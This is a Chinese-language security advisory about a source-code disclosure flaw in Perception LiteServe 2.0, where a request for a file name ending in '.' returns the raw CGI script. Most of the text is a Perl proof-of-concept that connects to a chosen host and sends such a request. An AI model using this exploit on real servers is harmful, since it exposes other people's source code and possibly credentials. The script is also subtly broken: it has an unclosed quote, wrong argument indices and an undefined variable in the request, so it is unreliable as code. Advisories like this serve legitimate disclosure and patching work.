Perception LiteServe CGI源代码泄露漏洞发布时间:2002-11-22 更新时间:2002-11-22 严重程度:中 威胁程度:用户敏感信息泄露 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:6188 受影响系统 Perception LiteServe 2.0详细描述 Perception LiteServe集成多种功能如HTTP,FTP,SMTP和POP3的服务程序。 Perception LiteServe对文件名处理不正确,在处理以'.'结尾的文件名请求会泄露脚本源代码信息。 测试代码 #!/usr/bin/perl # # LS_FETCH.PL # By Matthew Murphy # LiteServe 2.02 and prior - CGI Disclosure # Usage: perl ls_fetch.pl [filename] [host] [alias] [port] use IO::Socket; use URI::Escape; $alias = "cgi-isapi"; # Default LiteServe CGI alias $port = 80; if (@ARGV < 2 || @ARGV > 4) { print STDOUT "Usage: perl $0 [filename] [host] [alias=cgi-isapi] [port=80] } else { if (@ARGV >= 3) { $alias = $ARGV[2]; } if (@ARGV == 4) { $port = $ARGV[3]; } $filename = $ARGV[1]; $host = $ARGV[2]; $f = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Proto=>"tcp"); $f->autoflush(1); $b = sprintf("GET /%s/%s. HTTP/1.0\r\n\r\n", $alias, uri_escape($file)); print $f $b; while (defined($line=<$f>)) { print STDOUT $line; } undef $f; } 解决方案 无 相关信息 参考:http://online.securityfocus.com/archive/1/299912 |
